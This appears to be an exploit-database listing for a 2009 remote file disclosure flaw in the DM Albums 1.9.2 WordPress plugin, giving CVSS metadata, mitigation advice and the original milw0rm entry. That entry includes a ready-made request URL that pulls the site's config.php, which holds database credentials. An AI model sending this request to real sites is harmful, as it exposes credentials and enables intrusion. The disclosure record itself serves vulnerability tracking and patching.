header-logo
Suggest Exploit
vendor:
DM Albums
by:
Stack
7,5
CVSS
HIGH
Remote File Dislosure
200
CWE
Product Name: DM Albums
Affected Version From: 1.9.2
Affected Version To: 1.9.2
Patch Exists: YES
Related CWE: N/A
CPE: a:wordpress:dm_albums
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WordPress Plugin DM Albums 1.9.2 Remote File Dislosure Vulnerability

A vulnerability in WordPress Plugin DM Albums 1.9.2 allows an attacker to download the config.php file from the server by sending a specially crafted HTTP request.

Mitigation:

Upgrade to the latest version of the plugin.
Source

Exploit-DB raw data:

#############################################################################################
[+] WordPress Plugin DM Albums 1.9.2 Remote File Dislosure Vulnerability
[+] Author : Stack
[+] Greetz : V4 Team & Sec R1z
[+] Download Script : http://wordpress.org/extend/plugins/dm-albums/
#############################################################################################
[+] Xpl :
[+] http://[sitename]/[path]//wp-content/plugins/dm-albums/dm-albums.php?download=yes&file=config.php&currdir=/wp-content/plugins/dm-albums/
#############################################################################################

# milw0rm.com [2009-06-30]

Navigation

Suggest Exploit

Services By CQR